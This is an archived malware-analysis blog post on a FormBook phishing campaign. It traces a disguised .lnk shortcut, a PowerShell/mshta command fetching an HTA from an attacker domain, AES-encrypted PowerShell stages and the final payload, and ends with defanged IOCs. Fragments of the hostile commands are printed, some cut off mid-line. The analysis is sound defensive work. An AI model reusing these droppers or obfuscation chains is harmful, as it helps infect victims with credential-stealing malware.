[QuickNote] Examining Formbook Campaign via Phishing Emails Published: 2023-07-06 · Archived: 2026-04-05 18:19:02 UTC 1. Initial foothold The attacker sent an email with an attachment named “ brochure-for-2023-elite-events.rar ”. This rar file contains only one lnk (shortcut) file named: brochure-for-2023-elite-events.pdf.lnk . If the user does not pay attention and extracts the file, it will be displayed as a PDF icon like the following: The analysis of this lnk file reveals that it utilizes powershell.exe to execute an hta script. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompa 2. Analyzing HTA script Download the file pintu.hta for analysis. This file contains a VBScript code snippet as follows: To facilitate the deobfuscation of the code snippet above, I have modified it as follows: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 1 of 7 The modified pintu.hta file is executed, resulting in a Vbscript containing a function that executes a subsequent PowerShell script. 3. Analyzing the 1 st Powershell script ZAA = "powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -A The script performs the following tasks: Decode the base64 string assigned to the variable $xbFz and uses the first 16 bytes as the IV, while the remaining part is the encrypted data: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 2 of 7 Decode the base64 string assigned to the variable $HMTijTI and use it as the AES key: Using the key and IV, decrypt the encrypted data using AES in mode $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB : Based on the result of the first two bytes being 0x1F 0x8B , we know that the decrypted data has been compressed using Gzip. Decompressing this data yields the next PowerShell script: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 3 of 7 4. Analyzing the 2 nd Powershell script The important part of this script is as follows: function Dlt($iZq) { $IBY = 6399; $dtu = $Null; foreach($kKX in $iZq) { $dtu += [char]($kKX - $IBY) }; return $dtu }; function RPJ() { $oUv = $env: AppData + '\';$DASUDIl= $env:AppData;$GXIrywM = $DASUDIl + '\blank.pdf ';If(Test-Pat 883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6 It can be observed that it will use the Dlt function to decode the download addresses of the files (next stage payloads). By rewriting this function in Python and performing the decoding, we obtain the download addresses for the payload and decoy PDF as follows: [+] Defanged URL(s): https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 4 of 7 hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf hxxps://thanhancompany[.]com/grip/883.exe 5. Formbook payload At the time of analysis, I was able to successfully download the payload, its sha256 is: 00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4 The .NET payload, when executed, will unpack the final payload, which is the payload of the FormBook malware (this is likely a new build of the malware). https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 5 of 7 Utilize Fakenet and monitor the payload generation process to generate traffic to hosts: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 6 of 7 6. IOCs: hxxp://thanhancompany[.]com/ta/pintu.hta Hta script hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf Decoy PDF hxxps://thanhancompany[.]com/grip/883.exe Payload URI 00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4 Payload SHA256 End. m4n0w4r Source: https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ Page 7 of 7